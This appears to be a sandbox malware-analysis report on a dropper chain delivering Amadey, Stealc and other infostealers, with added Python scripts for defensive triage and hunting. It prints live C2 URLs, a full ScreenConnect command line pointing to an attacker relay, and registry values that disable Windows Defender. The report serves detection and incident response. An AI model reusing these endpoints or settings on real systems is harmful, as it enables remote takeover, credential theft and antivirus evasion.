Analysis

max time kernel: 149s
max time network: 154s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 19-12-2024 16:11

Static task: static1
Behavioral task: behavioral1
Sample: 36113a3c12cb6d303cdf560916665146e6fb8a6f8bca8a79cce6472fbf01611c.exe
Resource: win10v2004-20241007-en

General

Target: 36113a3c12cb6d303cdf560916665146e6fb8a6f8bca8a79cce6472fbf01611c.exe
Size: 7.0MB
MD5: f53b2824aed0ae11e8dd9ef750b2fb2c
SHA1: b9ad0fc166c23405229f4c3e581458c807b37b58
SHA256: 36113a3c12cb6d303cdf560916665146e6fb8a6f8bca8a79cce6472fbf01611c
SHA512: 2572d9f33c66aea7cf08f5c30f68c1d5740ea9710e8f3e723f3ff41bde352b049cc4f4c004f604ccde870d2b3f6e6abe063364f5f8281060eb4a84d336cf7feb
SSDEEP: 196608:XP1e4miRlgZQGWa0ddo9HjT/amRHkr27oUEB81cQ/HyE7lSHs:X84mi/sWa9HCmxd7oB8T/B7l
Malware Config

Extracted: amadey
version: 4.42
botnet: 9c9aa5
C2: http://185.215.113.43
install_dir: abc3bc1985
install_file: skotes.exe
strings_key: 8a35cf2ea38c2817dba29a4b5b25dcf0
url_paths: /Zu7JuNko/index.php
Full C2 URL (C2 + url_paths): http://185.215.113.43/Zu7JuNko/index.php

Extracted: lumma

Extracted: stealc
botnet: stok
C2: http://185.215.113.206
url_path: /c4becf79229cb002.php
Full C2 URL (C2 + url_path): http://185.215.113.206/c4becf79229cb002.php

Extracted: cryptbot

Both C2 hosts sit in 185.215.113.0/24; the Amadey install_file skotes.exe is the loader process that appears throughout the signatures below.
Signatures

Amadey family
Cryptbot family
Lumma family
Stealc family
Vidar family

Detect Vidar Stealer (3 IoCs)
resource  yara_rule
  behavioral1/files/0x000d000000023b2f-265.dat  family_vidar_v7
  behavioral1/memory/4528-269-0x0000000000400000-0x0000000000639000-memory.dmp  family_vidar_v7
  behavioral1/memory/4528-337-0x0000000000400000-0x0000000000639000-memory.dmp  family_vidar_v7
PID 4528 is 595994f5cc9c4c769929b462827bc67e.exe (see "Executes dropped EXE").

Modifies Windows Defender Real-Time Protection policy settings (11 IoCs)
Two of the dropped binaries write the Group Policy location for Defender's real-time settings, turning off real-time, behaviour, on-access and IOAV scanning. All writes are Set value (int) under:
\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection
  Key created                         4C806m.exe
  DisableRealtimeMonitoring = "1"     4C806m.exe, 7d3ca92efa.exe
  DisableBehaviorMonitoring = "1"     4C806m.exe, 7d3ca92efa.exe
  DisableIOAVProtection = "1"         4C806m.exe, 7d3ca92efa.exe
  DisableOnAccessProtection = "1"     4C806m.exe, 7d3ca92efa.exe
  DisableScanOnRealtimeEnable = "1"   4C806m.exe, 7d3ca92efa.exe

Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
description  pid  Process  procid_target
  PID 7284 created 3000  7284  b7a1e2f349.exe  50
b7a1e2f349.exe started a child with a parent other than itself (parent PID spoofing), so process-tree views will not show the child under the dropper.

Enumerates VirtualBox registry keys (2 TTPs, 2 IoCs)
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF  9a1c193d0b.exe, cedb729c19.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 15 IoCs)
  Key opened  \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  by: 4320ee3d91.exe, skotes.exe (x3), 4C806m.exe, c1de1e1e88.exe, 3Z30a.exe, b7a1e2f349.exe, 1V40F8.exe, 2q4507.exe, 9a1c193d0b.exe, 002e33e6e2.exe, 7d3ca92efa.exe, 70a82b2704.exe, cedb729c19.exe
Command and Scripting Interpreter: PowerShell (1 TTP, 6 IoCs)
Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths and processes.
pid  Process
  6712  powershell.exe
  7528  powershell.exe
  8244  powershell.exe
  3144  powershell.exe
  3388  powershell.exe
  7928  powershell.exe
The exclusions themselves are not recorded on this page; on a live host, check Get-MpPreference (ExclusionPath, ExclusionExtension, ExclusionProcess) for entries matching the %TEMP% drop paths listed under "Adds Run key to start application".

Downloads MZ/PE file
Sets service image path in registry (2 TTPs, 1 IoC)
description  ioc  Process
  Set value (str)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (98a59bd0eed9222b)\ImagePath  ScreenConnect.ClientService.exe
  value (as recorded by the sandbox, quotes and backslashes escaped):
  "\"C:\\Program Files (x86)\\ScreenConnect Client (98a59bd0eed9222b)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=gips620.top&p=8880&s=71ab53b0-a752-4e29-a927-f54fa80db420&k=BgIAAACkAABSU0ExAAgAAAEAAQDpOwIVy34yVx7xLDnH6rBeYx7mmiLN2yQyIYdJTxYIVHOsytxx89D0YKoH68EoEXToTuDpMmwJb%2bhrlJ3faNFTpvu7W8w3%2fxYUdeWuXWg%2bTQxXr6EWby912nykdroWfBxDx6Lmxg1gxGgRJHC8Oc96zV%2fiaqo5GlyagtszKkrbPOWW4FBVQPXhlUfH4mlFE0i0vcMxGginTYl8IjGBzr94ANeAXwajoe9Cjam2haoL%2f%2bgHMtFYBZJisALFnyX3zECpRv7vqWzNAQJYIqY6qDuC2lEbs0NtuBMSfQRW1t0ZOk7cEzuQjq72QbWf1bR8rZf%2b0t3VNSgkIUcBljvpSRK7&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAr3enNPAhkUuG52MNvdQztwAAAAACAAAAAAAQZgAAAAEAACAAAACXC4PLvgxoAPRz%2bLjk9ns3Agq8rsKfs7C7GtMZq7JL%2bgAAAAAOgAAAAAIAACAAAAA04mRIzvTYvEtcsKn528OUlqMwooJJ8Q5Tnrw%2fctqDZKAEAAAOfd9Nu4rQu6nfnZoH4J82xTFp7dhU96Gkr3QrjSVO2PDHf5l2Q6VuzwVUHPIzLs%2bFMC2TLhuSO2LtDC8Jh1MMAi9HUadkG44AgQRbPKEWh7Eloc%2bEiAWgxl44osiHubWuZje%2bbfWZpV1obC3%2bFfQiKCFW8153MQFKJ2jefpyaJHCOMo5onxIFhLq81KsGKqCeOzYgV40oKeEUIYBAO4r0X8IpmdRySeN%2fsLeQpfPWy5UvhZO6VVmz6Es0udFnneEuNRHA1Yh%2fFlRTv%2fo3iSCvUUd%2bc%2fVi7VX%2b6FyaVekFy6hYCh7JjIKyiEnch3sBsli%2bjyv1xlHbre0d7gXn4TwIGrfbTcwFjx1iosq8ll4EmrfvfiqUM0RUBINj1Eoh8V601TAav3ZU7kx6kZaZBsFyL57z%2fttktd6PLAfUetqvqtp%2bR2kOuTFcrXl5kxJ3tFb99gpWkH7dNdIinv4KqcE9IL4XwqvwK0TZnzc86nkz9Yy8HAeUsBgBG7OVzaJP3p4%2fbrC%2f50F7t2fr0hYRqqix%2fvD%2fZjnC3Pyr3Dhbq5vMmVjE6KPpn8ZhRdUuhrOQDqulPQYnjVvd8LXRlMZJMuY5aCoKALcOIWnxrE1kXvacA4aQgTNfVpzlqhiKkz4DfRZwNsIrS1FOANUvtXFVDVF%2bA%2f4Sq4oLI2V8B8JMRPvjfOT6J70lWob%2f85l1%2fqnSYWs6k%2f%2bbwcp43bXkKSr6woeXJj8BaFVGuP%2bc296gHXWuGmm9oR6ZRX5pInlgUBaR4zeqj1BcuDMEoh8vx%2fRuyq1RCC7s%2fj%2fm4FUiBaKkkXxbb8a7JMYB%2fX04BhecreziznM0zI%2bD0u0GRpXECIUAxqEl1RQhYXUnJdJs%2b%2bQc2sDrq7rRPjnYt6zsLCImNwc5BBa77mzUyvoZNYg1JuNitqjuwrXmBFYhbtQuQP0sbGHd7qE9%2f56u67tD5UwSz4T0RXwYNxZ6TH3SZyoxt3NPkWS0lLZre0WsZc8j4fz6MqvHtLhcu0432OcR8eV6MmILy6uwdK7vQV%2f0IZyFbwsDlzszUlAHI1Zj2hJOotLRxEdL%2f45zqWd7yMK%2bKyNnZXFI16evo4qqXzSruF9SE3x2y1cKV1ezNCcY%2fjkgZ5DJxIs12zZ9fN4yiuttvTU84mspNs5ssw%2fi0IWkq4o%2fSW%2f%2bVKhXa99naPX0igCHP1xZonqn%2fx9nCxyAk7dedt0mBtRfhdBwMOXU0UX2pj%2f0zBdCmAn93rIU%2fmlzP9VaTezK7FtL5wpAAyavMyEswA%2ba4nAXL1dL4ovKbZqZvVr%2f03Xnb%2fsicrP%2fDYE549%2fbZm2PJm0uS6cv0uZPygOfrQA4IwCPKrbT%2bn%2bxuPsoNGX7O4PB%2bzNwPXE2zAofwO43bnpjdDMoaKRtPrP6FHDjzI79k4T89JvAdPoZppc6ZOvIo%2baDtQ7iCH6fsq0y9k%2bdueGFn5k8GzYxUZEKUjCth44Mh42iwo37CS%2fk1qk7swpLIbAoO1nnm9T9fjpxzjppA%2fh%2fLIxDCxH3H63fQzs%2fM0FbAJu0IaP2jDXZDtWJsUYPz74%2f6rcMsDFlpoNvwhwFiX38z2wAGkAAAADE50g4UmVmTLMLv47k3B9i1eXg3Mg%2b%2bQGfnBMtDe9JXFShA5I7snDvCqlqIsexGhD8ZMuEMoL2kVSa1hkUDhjd&c=VIRUS101&c=https%3a%2f%2ft.me%2fvirus101Screenconnect&c=PC%20RAT&c=PC%20RAT&c=&c=&c=&c=\""
Read as a ScreenConnect client parameter string: e=Access is a persistent unattended-access agent, y=Guest the client role, h=gips620.top and p=8880 the relay the agent connects to, s=71ab53b0-a752-4e29-a927-f54fa80db420 the session ID. k= starts with a CAPI PUBLICKEYBLOB header ("RSA1" once base64-decoded), so it is the server's public key; v= starts with the DPAPI blob signature. The c= custom properties are operator-set labels: VIRUS101, https://t.me/virus101Screenconnect, PC RAT, PC RAT, then four empty fields. gips620.top:8880 and the session ID are the terms to hunt for across the estate; the ScreenConnect binaries themselves are legitimate signed software.
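Pulling the relay parameters out of an ImagePath like the one above is the first thing to do with any ScreenConnect client found during response, since the host and session ID are what distinguish an attacker's instance from the organisation's own. The following is an added example, not part of the sandbox report and not ConnectWise code: it parses the parameter string, derives hunt terms and applies three checks. The sample value is the report's ImagePath with the escaping undone and the long k= and v= blobs replaced by placeholders; the set of trusted relay hosts passed to assess() is an assumption the caller supplies.

```python
import re
from urllib.parse import parse_qs

# Constructed sample: the ImagePath recorded above with the sandbox's \" and \\ escaping undone.
# The k= (public key) and v= (DPAPI blob) values are placeholders; host, port, session ID and
# the c= custom properties are exactly as on the page.
SAMPLE_IMAGE_PATH = (
    '"C:\\Program Files (x86)\\ScreenConnect Client (98a59bd0eed9222b)\\ScreenConnect.ClientService.exe" '
    '"?e=Access&y=Guest&h=gips620.top&p=8880&s=71ab53b0-a752-4e29-a927-f54fa80db420'
    '&k=PLACEHOLDER_PUBLIC_KEY&v=PLACEHOLDER_DPAPI_BLOB'
    '&c=VIRUS101&c=https%3a%2f%2ft.me%2fvirus101Screenconnect&c=PC%20RAT&c=PC%20RAT&c=&c=&c=&c="'
)

PARAM_RE = re.compile(r'"\?([^"]*)"')  # the second quoted argument: "?e=...&h=...&c=..."


def parse_screenconnect_imagepath(image_path):
    """Return the relay parameters a ScreenConnect client service was installed with, or None."""
    m = PARAM_RE.search(image_path)
    if not m:
        return None
    # parse_qs percent-decodes values and keeps every repeated c= field, in order.
    q = parse_qs(m.group(1), keep_blank_values=True)

    def first(key):
        return q.get(key, [''])[0]

    port = first('p')
    return {
        'exe': image_path.split('"')[1],
        'session_type': first('e'),   # Access = installed unattended agent; Support = ad hoc session
        'role': first('y'),
        'relay_host': first('h'),
        'relay_port': int(port) if port.isdigit() else None,
        'session_id': first('s'),
        'custom_properties': q.get('c', []),  # operator-set labels shown in the ScreenConnect console
    }


def hunt_terms(info):
    """Strings worth searching for in EDR, proxy and DNS telemetry."""
    terms = {info['relay_host'], f"{info['relay_host']}:{info['relay_port']}", info['session_id']}
    terms |= {p for p in info['custom_properties'] if p.strip()}
    return terms


def assess(info, trusted_relays):
    """Reasons to treat this client as attacker-installed. trusted_relays: the org's own ScreenConnect hosts."""
    reasons = []
    if info['relay_host'] not in trusted_relays:
        reasons.append(f"relay {info['relay_host']} is not an organisation ScreenConnect server")
    if info['session_type'] == 'Access':
        reasons.append('unattended Access session (installed agent that reconnects on its own)')
    if not info['exe'].lower().startswith('c:\\program files'):
        reasons.append('client service installed outside Program Files')
    return reasons


if __name__ == '__main__':
    info = parse_screenconnect_imagepath(SAMPLE_IMAGE_PATH)
    print(info['relay_host'], info['relay_port'], info['session_id'])
    print(sorted(hunt_terms(info)))
    for r in assess(info, trusted_relays=set()):
        print('-', r)
```

The c= fields are the quickest attribution hook: they are whatever the operator typed into the session group properties when building the installer, and here they name the seller's Telegram handle.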
Checks BIOS information in registry (2 TTPs, 30 IoCs)
BIOS information is often read in order to detect sandboxing environments.
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  by: 4320ee3d91.exe, cedb729c19.exe, 2q4507.exe, 4C806m.exe, 002e33e6e2.exe, 9a1c193d0b.exe, 7d3ca92efa.exe, c1de1e1e88.exe, skotes.exe (x3), b7a1e2f349.exe, 3Z30a.exe, 70a82b2704.exe, 1V40F8.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion   by: skotes.exe (x3), 2q4507.exe, 4320ee3d91.exe, 9a1c193d0b.exe, 1V40F8.exe, 3Z30a.exe, 4C806m.exe, b7a1e2f349.exe, 7d3ca92efa.exe, 70a82b2704.exe, cedb729c19.exe, 002e33e6e2.exe, c1de1e1e88.exe
Checks computer location settings (2 TTPs, 11 IoCs)
Looks up the country code configured in the registry, likely for a geofence.
  Key value queried  \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation  by: NN9Dd7c.exe, 595994f5cc9c4c769929b462827bc67e.exe, 00f883d031.exe, skotes.exe, ga70pjP.exe, cfb5c42bfd.exe, 716b2bf6d0ea4bc89dd192d17a90ce2f.exe, bbfa9a48763748409ab9f84a4b4d1cca.exe, 1048c089ab.exe, 1V40F8.exe, 244e0736f6f94ca18cd319153573a00b.exe
Event Triggered Execution: Component Object Model Hijacking (1 TTP)
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

Executes dropped EXE (53 IoCs)
pid  Process (in the order the sandbox recorded them)
  3952 p6D27.exe; 2356 R5B56.exe; 2140 1V40F8.exe; 556 skotes.exe; 2332 2q4507.exe; 1412 3Z30a.exe; 1704 kz8ZdyP.exe; 2336 4C806m.exe; 2284 NN9Dd7c.exe; 2012 ga70pjP.exe;
  4224 57dcd7e51c.exe; 4528 595994f5cc9c4c769929b462827bc67e.exe; 5076 244e0736f6f94ca18cd319153573a00b.exe; 1316 kz8ZdyP.exe; 400 kz8ZdyP.exe; 7384 9a1c193d0b.exe;
  6264 ScreenConnect.ClientService.exe; 7224 ScreenConnect.WindowsClient.exe; 7512 ScreenConnect.WindowsClient.exe; 7652 57dcd7e51c.exe; 7008 00f883d031.exe; 5704 skotes.exe;
  392 7z.exe; 3476 7z.exe; 5200 7z.exe; 5564 7z.exe; 7280 7z.exe; 6592 7z.exe; 5384 7z.exe; 4464 7z.exe; 8124 in.exe;
  6380 002e33e6e2.exe; 5960 4320ee3d91.exe; 5676 64711675d3.exe; 7872 7d3ca92efa.exe; 5028 ScreenConnect.WindowsClient.exe; 6452 cfb5c42bfd.exe;
  7768 bbfa9a48763748409ab9f84a4b4d1cca.exe; 5464 716b2bf6d0ea4bc89dd192d17a90ce2f.exe; 1952 fd4b71514b.exe; 7036 70a82b2704.exe; 1996 cedb729c19.exe;
  2992 fire.exe; 8376 fire.exe; 8680 e200e74b60.exe; 7720 e200e74b60.exe; 6360 c1de1e1e88.exe; 5620 skotes.exe; 7284 b7a1e2f349.exe; 8080 fd4b71514b.exe;
  7800 Intel_PTT_EK_Recertification.exe; 7588 1048c089ab.exe; 9456 3dbe003be11c428091b74912c836eb73.exe
The chain reads: two nested self-extracting layers (p6D27.exe, R5B56.exe), the Amadey dropper 1V40F8.exe and its install_file skotes.exe, the first wave of payloads, the ScreenConnect client install, eight 7z.exe extraction runs, then a second wave that skotes.exe fetched into %TEMP%\1017718001 through \1017721001 (see the Run keys below).
Identifies Wine through registry keys (2 TTPs, 15 IoCs)
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
  Key opened  \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine  by: 2q4507.exe, 9a1c193d0b.exe, 7d3ca92efa.exe, c1de1e1e88.exe, 1V40F8.exe, skotes.exe (x3), 002e33e6e2.exe, 4320ee3d91.exe, cedb729c19.exe, 70a82b2704.exe, b7a1e2f349.exe, 3Z30a.exe, 4C806m.exe
The same 13 binaries (skotes.exe three times) perform the VirtualBox ACPI, BIOS-version and Wine checks and the NtSetInformationThreadHideFromDebugger call below: one shared anti-analysis routine across the loader and the payloads it drops.
Loads dropped DLL (30 IoCs)
pid  Process
  1292  MsiExec.exe
  2832  rundll32.exe  (9 loads)
  5356  MsiExec.exe
  7008  MsiExec.exe
  6264  ScreenConnect.ClientService.exe  (10 loads)
  392, 3476, 5200, 5564, 7280, 6592, 5384, 4464  7z.exe  (one load each)
Reads data files stored by FTP clients (2 TTPs)
Tries to access configuration files associated with programs like FileZilla.

Reads user/profile data of local email clients (2 TTPs)
Email clients store some user data on disk where infostealers will often target it.

Reads user/profile data of web browsers (3 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Unsecured Credentials: Credentials In Files (1 TTP)
Steals credentials from unsecured files.

Disables Windows Defender Tamper Protection via registry (3 IoCs)
description  ioc  Process
  Key created      \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features  4C806m.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"  4C806m.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"  7d3ca92efa.exe
With Tamper Protection enabled, Defender blocks direct writes to this value from untrusted processes; the records show the attempts, not whether they took effect on the sandbox image.
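The Defender policy writes, the TamperProtection writes and the VirtualBox, BIOS and Wine probes above all arrive as registry records of one shape: action, key path, optional value, process. The following is an added example, not part of the sandbox report, that parses records in that shape and tags each process with what it did, so the pair of processes that both neuters Defender and fingerprints the VM can be pulled out of a long report without reading every line. The sample lines are copied from the signatures on this page; the tag names and the ANTI_VM_MARKERS table are this example's own choices, not the sandbox's.

```python
import re
from collections import defaultdict

# Constructed sample: registry records copied from the signatures above, one per line, in the
# sandbox's own  <action> <path> [= "<value>"] <process>  form. The last line (firefox.exe
# reading CPU speed) is benign noise and should earn no tag.
SAMPLE_EVENTS = r"""
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 4C806m.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 7d3ca92efa.exe
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 4C806m.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 4C806m.exe
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF 9a1c193d0b.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe
Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine 4C806m.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
"""

EVENT_RE = re.compile(
    r'^(?P<action>Key opened|Key created|Key queried|Key value queried|Set value \(\w+\))\s+'
    r'(?P<path>\\REGISTRY\\.+?)'          # lazy: key paths contain spaces, so stop where the rest fits
    r'(?:\s=\s"(?P<value>[^"]*)")?'       # optional  = "<value>"  on Set value records
    r'\s+(?P<proc>\S+)$'                  # the acting process is always the last token
)

# Group Policy location of Defender's real-time settings, and the Features key the sample also writes.
DEFENDER_POLICY = '\\Policies\\Microsoft\\Windows Defender\\'
TAMPER_PROTECTION = '\\Windows Defender\\Features\\TamperProtection'

# Registry probes that identify a VM or sandbox, keyed by the path fragment that gives them away.
ANTI_VM_MARKERS = {
    '\\HARDWARE\\ACPI\\DSDT\\VBOX__': 'anti_vm:vbox_acpi',
    '\\Services\\VBoxSF': 'anti_vm:vbox_driver',
    '\\Software\\Wine': 'anti_vm:wine',
    '\\System\\SystemBiosVersion': 'anti_vm:bios_version',
    '\\System\\VideoBiosVersion': 'anti_vm:bios_version',
}


def parse_event(line):
    """Split one record into action, path, value (may be None) and process; None if it does not parse."""
    m = EVENT_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(ev):
    """Tags one parsed record earns. A Key created under the policy path earns nothing by itself."""
    tags = set()
    path, value, action = ev['path'], ev['value'], ev['action']
    leaf = path.rsplit('\\', 1)[-1]
    if action.startswith('Set value') and DEFENDER_POLICY in path and leaf.startswith('Disable') and value == '1':
        tags.add('defender:policy_disable')
    if path.endswith(TAMPER_PROTECTION) and value == '0':
        tags.add('defender:tamper_protection_off')
    for marker, tag in ANTI_VM_MARKERS.items():
        if marker in path:
            tags.add(tag)
    return tags


def triage(text):
    """Aggregate tags per process; processes that earned no tag are dropped from the result."""
    findings = defaultdict(set)
    for line in text.splitlines():
        ev = parse_event(line)
        if ev:
            findings[ev['proc']] |= classify(ev)
    return {proc: sorted(tags) for proc, tags in findings.items() if tags}


def defender_and_anti_vm(findings):
    """Processes that both touch Defender and probe for a VM: the loader/payload pair to pivot on first."""
    return sorted(p for p, t in findings.items()
                  if any(x.startswith('defender:') for x in t) and any(x.startswith('anti_vm:') for x in t))


if __name__ == '__main__':
    result = triage(SAMPLE_EVENTS)
    for proc, tags in sorted(result.items()):
        print(f'{proc:16} {", ".join(tags)}')
    print('defender + anti-VM:', defender_and_anti_vm(result))
```

On the sample lines, 4C806m.exe is the only process tagged for both, which matches the page: it creates the policy key, sets the five Disable* values, zeroes TamperProtection and checks for Wine.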
Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Adds Run key to start application (2 TTPs, 7 IoCs)
description  ioc  Process (values shown with the sandbox's escaping undone)
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"  36113a3c12cb6d303cdf560916665146e6fb8a6f8bca8a79cce6472fbf01611c.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\"  p6D27.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\"  R5B56.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\002e33e6e2.exe = C:\Users\Admin\AppData\Local\Temp\1017718001\002e33e6e2.exe  skotes.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4320ee3d91.exe = C:\Users\Admin\AppData\Local\Temp\1017719001\4320ee3d91.exe  skotes.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\64711675d3.exe = C:\Users\Admin\AppData\Local\Temp\1017720001\64711675d3.exe  skotes.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7d3ca92efa.exe = C:\Users\Admin\AppData\Local\Temp\1017721001\7d3ca92efa.exe  skotes.exe
The three wextract_cleanup RunOnce entries are the standard self-cleanup of Windows' wextract/IExpress self-extractor (advpack.dll DelNodeRunDLL32 over an IXP00n.TMP directory), confirming that the sample, p6D27.exe and R5B56.exe are nested SFX layers rather than persistence. The four HKCU Run entries are Amadey's (skotes.exe) persistence for the payloads it downloaded, each named after its own file.
Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Enumerates connected drives (3 TTPs, 46 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
  File opened (read-only)  \??\A: through \??\Z:, except C:, D: and F:  msiexec.exe (each of the 23 letters opened twice)
All 46 opens come from msiexec.exe, i.e. Windows Installer enumerating volumes during the ScreenConnect MSI install, not from the stealer payloads.
Legitimate hosting services abused for malware hosting/C2 (1 TTP, 6 IoCs)
flow  ioc
  266, 267, 398, 57, 58, 59  raw.githubusercontent.com

AutoIT Executable (1 IoC)
AutoIT scripts compiled to PE executables.
resource  yara_rule
  behavioral1/files/0x0008000000023d3e-5002.dat  autoit_exe
Boot or Logon Autostart Execution: Authentication Package (1 TTP, 1 IoC)
Suspicious Windows Authentication Registry Modification.
description  ioc  Process
  Set value (data)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages  msiexec.exe
  value (hex): 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800390038006100350039006200640030006500650064003900320032003200620029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000
  decoded (REG_MULTI_SZ, UTF-16LE): "msv1_0", "C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsAuthenticationPackage.dll"
LSASS loads every DLL listed here at boot, so the ScreenConnect authentication package runs inside lsass.exe on every start. A legitimate ScreenConnect client install registers the same DLL; what makes this one hostile is the chain that delivered it and the relay it reports to.
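The sandbox shows the Authentication Packages value only as hex, and a REG_MULTI_SZ is where an added LSA package is easiest to overlook. The following is an added example, not from the report, that decodes the blob above and flags any package beyond the stock one, treating an absolute path outside System32 as the strongest signal. The hex is copied verbatim from the record; the stock set {msv1_0} is this example's assumption for a default Windows 10 image, and domain or SSO software may legitimately add entries, so findings need the host's baseline.

```python
# Hex exactly as recorded above for HKLM\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages.
SAMPLE_AUTH_PACKAGES_HEX = (
    "6d007300760031005f003000000043003a005c00500072006f006700720061006d00200046006900"
    "6c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00"
    "650063007400200043006c00690065006e0074002000280039003800610035003900620064003000"
    "6500650064003900320032003200620029005c00530063007200650065006e0043006f006e006e00"
    "6500630074002e00570069006e0064006f0077007300410075007400680065006e00740069006300"
    "6100740069006f006e005000610063006b006100670065002e0064006c006c0000000000"
)

# Assumption: a stock Windows 10 image lists only msv1_0 (the MSV1_0/NTLM package).
DEFAULT_AUTH_PACKAGES = {'msv1_0'}
SYSTEM32 = 'c:\\windows\\system32\\'


def decode_multi_sz(hex_blob):
    """Decode a REG_MULTI_SZ given as hex: UTF-16LE, NUL between entries, double NUL at the end."""
    raw = bytes.fromhex(hex_blob)
    if len(raw) % 2:
        raise ValueError('REG_MULTI_SZ data must be an even number of bytes (UTF-16LE)')
    return [s for s in raw.decode('utf-16-le').split('\x00') if s]


def audit_auth_packages(hex_blob, defaults=DEFAULT_AUTH_PACKAGES):
    """Return (all entries, [(entry, reason) for entries that are not stock packages])."""
    entries = decode_multi_sz(hex_blob)
    findings = []
    for entry in entries:
        name = entry.lower()
        if name in defaults:
            continue
        # Stock packages are bare names resolved from System32; an absolute path elsewhere means a
        # third-party DLL will be mapped into lsass.exe at every boot.
        if '\\' in name and not name.startswith(SYSTEM32):
            findings.append((entry, 'full path outside System32'))
        else:
            findings.append((entry, 'not a stock package'))
    return entries, findings


if __name__ == '__main__':
    entries, findings = audit_auth_packages(SAMPLE_AUTH_PACKAGES_HEX)
    print('Authentication Packages:', entries)
    for entry, reason in findings:
        print(f'FLAG {reason}: {entry}')
```

The same decoder applies to the Security Packages and Notification Packages values under the same Lsa key, which are the other two REG_MULTI_SZ lists that get LSASS to load a DLL at boot.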
Drops file in System32 directory (3 IoCs)
description  ioc  Process
  File created  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (98a59bd0eed9222b)\u2lphl4j.tmp  ScreenConnect.ClientService.exe
  File created  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (98a59bd0eed9222b)\u2lphl4j.newcfg  ScreenConnect.ClientService.exe
  File created  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log  ScreenConnect.WindowsClient.exe
The systemprofile paths show the ScreenConnect service running as LocalSystem.

